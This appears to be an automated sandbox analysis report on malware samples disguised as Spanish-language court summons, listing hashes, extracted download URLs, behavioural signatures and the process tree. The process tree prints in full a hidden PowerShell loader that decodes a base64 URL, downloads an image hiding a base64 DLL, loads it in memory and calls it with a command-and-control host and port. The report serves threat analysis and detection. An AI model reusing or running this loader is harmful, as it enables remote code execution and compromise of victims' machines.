Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
12-11-2024 20:46
Static task
static1
Behavioral task
behavioral1
Sample
En este sentido, se le hace un llamado de atención para que se presente ante el Juez del Circuito T.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
En este sentido, se le hace un llamado de atención para que se presente ante el Juez del Circuito T.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Por medio de la presente, se le comunica que, en virtud del proceso No. 2024-52100-63561-56165, ejec.exe
Resource
win7-20241023-en
Behavioral task
behavioral4
Sample
Por medio de la presente, se le comunica que, en virtud del proceso No. 2024-52100-63561-56165, ejec.exe
Resource
win10v2004-20241007-en
General
-
Target
En este sentido, se le hace un llamado de atención para que se presente ante el Juez del Circuito T.bat
-
Size
210KB
-
MD5
ed413cc9ec12454b62e10a58bb2e4213
-
SHA1
a027ce72c41eb753d1e275eb955ddf8b323a84de
-
SHA256
81fe1c16a0c91c2ce2b997dfa0d6c3ecb03af6a9494024d273b902b2f088ca6e
-
SHA512
7ff5eb191033f5770f180ab3111fe6402cc9ac71540c6a6eda2b32e50a57e5b267a7006ce45f82b8e578962a5a2b7a605eda8cb525430fe889b4d941dd11f9cf
-
SSDEEP
6144:vZ5PFlZSyyiQNfwJIJ9wNfX3T7jVrDjDb7bLw8:B
Malware Config
Extracted
https://3105.filemail.com/api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904f
https://3105.filemail.com/api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904f
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2732 powershell.exe 6 2732 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2732 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2732 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2732 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1088 wrote to memory of 2732 1088 cmd.exe 31 PID 1088 wrote to memory of 2732 1088 cmd.exe 31 PID 1088 wrote to memory of 2732 1088 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\En este sentido, se le hace un llamado de atención para que se presente ante el Juez del Circuito T.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1tTDJfVG5JR0tRcW9jQjZ6THZjdk42OFRxX0ZwZkM0R2g4VkNnc3pfaURocVUzVVhfSF9veHYzY1V5c09VTHBNJnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDg1MTQ3MGEwOTA0Zg=='; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('barrioantioquia.webredirect.org', '6095');"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2732
-